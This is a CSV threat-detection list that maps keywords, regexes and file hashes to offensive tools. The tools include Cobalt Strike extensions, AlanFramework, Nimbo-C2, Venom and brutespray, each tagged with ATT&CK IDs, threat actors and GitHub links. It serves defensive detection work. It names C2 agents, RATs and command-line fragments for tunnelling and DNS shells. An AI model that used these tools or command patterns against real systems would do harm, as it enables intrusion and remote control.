"*afed646dee07893f5be9103606c2eeda2545e75b59b03e0a1e2fc42940e09d43*",".{0,1000}afed646dee07893f5be9103606c2eeda2545e75b59b03e0a1e2fc42940e09d43.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","33671"
"*afefe0380e25f02064d72df3e13645de51d59879b31b5d741e4458fdf9ebaa81*",".{0,1000}afefe0380e25f02064d72df3e13645de51d59879b31b5d741e4458fdf9ebaa81.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33673"
"*affa24f6e1fd339093365bfce238b94ec6948d4d1c401fc7dffc4921e9da0187*",".{0,1000}affa24f6e1fd339093365bfce238b94ec6948d4d1c401fc7dffc4921e9da0187.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","33675"
"*ag_load_script*",".{0,1000}ag_load_script.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","33676"
"*AG8AbwB0AGUAcgBBAHMAcwBlAG0AYgBsAHkAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIA*",".{0,1000}AG8AbwB0AGUAcgBBAHMAcwBlAG0AYgBsAHkAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIA.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","33677"
"*agent*DNSCommunication.cpp*",".{0,1000}agent.{0,1000}DNSCommunication\.cpp.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","33678"
"*agent.exe -dns -srvhost *",".{0,1000}agent\.exe\s\-dns\s\-srvhost\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","33679"
"*agent.exe -lhost * -reuse-port *",".{0,1000}agent\.exe\s\-lhost\s.{0,1000}\s\-reuse\-port\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","33680"
"*agent/blackvision.cpp*",".{0,1000}agent\/blackvision\.cpp.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","33682"
"*agent/cmd_download_files.*",".{0,1000}agent\/cmd_download_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33683"
"*agent/cmd_exec.*",".{0,1000}agent\/cmd_exec\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33684"
"*agent/cmd_kill.*",".{0,1000}agent\/cmd_kill\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33685"
"*agent/cmd_proxy.*",".{0,1000}agent\/cmd_proxy\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33686"
"*agent/cmd_run.c*",".{0,1000}agent\/cmd_run\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33687"
"*agent/cmd_shell.*",".{0,1000}agent\/cmd_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33688"
"*agent/cmd_sleep.*",".{0,1000}agent\/cmd_sleep\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33689"
"*agent/cmd_sysinfo.c*",".{0,1000}agent\/cmd_sysinfo\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33690"
"*agent/cmd_upload_files.*",".{0,1000}agent\/cmd_upload_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33691"
"*agent/dll.nim*",".{0,1000}agent\/dll\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","33692"
"*agent/elf.nim*",".{0,1000}agent\/elf\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","33693"
"*agent/exe.nim*",".{0,1000}agent\/exe\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","33694"
"*Agent/ratchatPT.go*",".{0,1000}Agent\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","33695"
"*agent\cmd_download_files.*",".{0,1000}agent\\cmd_download_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33696"
"*agent\cmd_exec.*",".{0,1000}agent\\cmd_exec\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33697"
"*agent\cmd_kill.*",".{0,1000}agent\\cmd_kill\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33698"
"*agent\cmd_proxy.*",".{0,1000}agent\\cmd_proxy\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33699"
"*agent\cmd_run.c*",".{0,1000}agent\\cmd_run\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33700"
"*agent\cmd_shell.*",".{0,1000}agent\\cmd_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33701"
"*agent\cmd_sleep.*",".{0,1000}agent\\cmd_sleep\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33702"
"*agent\cmd_sysinfo.c*",".{0,1000}agent\\cmd_sysinfo\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33703"
"*agent\cmd_upload_files.*",".{0,1000}agent\\cmd_upload_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33704"
"*agent_code/bash_executor*",".{0,1000}agent_code\/bash_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","#linux","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","33705"
"*agent_dll.dll*",".{0,1000}agent_dll\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33706"
"*agent_linux_x64 -lport *",".{0,1000}agent_linux_x64\s\-lport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#linux","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","33707"
"*agent_linux_x64 -rhost * -rport *",".{0,1000}agent_linux_x64\s\-rhost\s.{0,1000}\s\-rport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#linux","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","33708"
"*agents/Follina-2*",".{0,1000}agents\/Follina\-2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","33715"
"*AggressiveProxy.cna*",".{0,1000}AggressiveProxy\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","33717"
"*aggressor.beacons*",".{0,1000}aggressor\.beacons.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33718"
"*aggressor.bshell*",".{0,1000}aggressor\.bshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33719"
"*aggressor.cna*",".{0,1000}aggressor\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","33720"
"*aggressor.dialog*",".{0,1000}aggressor\.dialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","33721"
"*aggressor.println*",".{0,1000}aggressor\.println.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 